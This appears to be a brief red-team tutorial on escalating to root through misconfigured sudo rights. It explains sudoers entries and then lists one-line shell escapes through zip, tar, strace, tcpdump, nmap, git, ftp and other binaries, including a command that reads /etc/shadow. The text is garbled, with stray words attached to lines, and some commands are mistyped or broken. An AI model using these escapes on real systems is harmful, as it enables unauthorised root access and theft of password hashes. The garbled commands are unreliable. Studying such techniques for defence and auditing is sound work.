The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers
file.git
During Red Teaming, sometime we encounter some situation where in we need to escalate our privilege to root or other users. an attacker can take advantage of sudo permission to execute a shell.shell
root ALL=(ALL) ALL
Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.bash
The first part is the user, the second is the terminal from where the user can use the sudo
command, the third part is which users he may act as, and the last one is which commands he may run when using.sudo
tcp
touhid ALL= /sbin/poweroff
Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password.ide
touhid ALL = (root) NOPASSWD: /usr/bin/find
Explain 3: The above command, make the user touhid can from any terminal, run the command find as root user without password.this
To Exploiting sudo user u need to find which command u have to allow.sudo -l
spa
The above command shows which command have allowed to the current user.scala
Here sudo -l, Shows the user has all this binary allowed to do as on root user without password.code
Let’s take a look at all binary one by one (which is mention in the index only) and Escalate Privilege to root user.ip
$ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"
$ sudo tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash
$ sudo strace -o/dev/null /bin/bash
$ echo $’id\ncat /etc/shadow’ > /tmp/.shell $ chmod +x /tmp/.shell $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root
$ echo "os.execute('/bin/sh')" > /tmp/shell.nse $ sudo nmap --script=/tmp/shell.nse
$ sudo scp -S /path/yourscript x y
$ sudo except spawn sh then sh
$ sudo nano -S /bin/bash
type your command and hit CTRL+T
$ sudo git help status
type: !/bin/bash
$ sudo ftp
type : !/bin/sh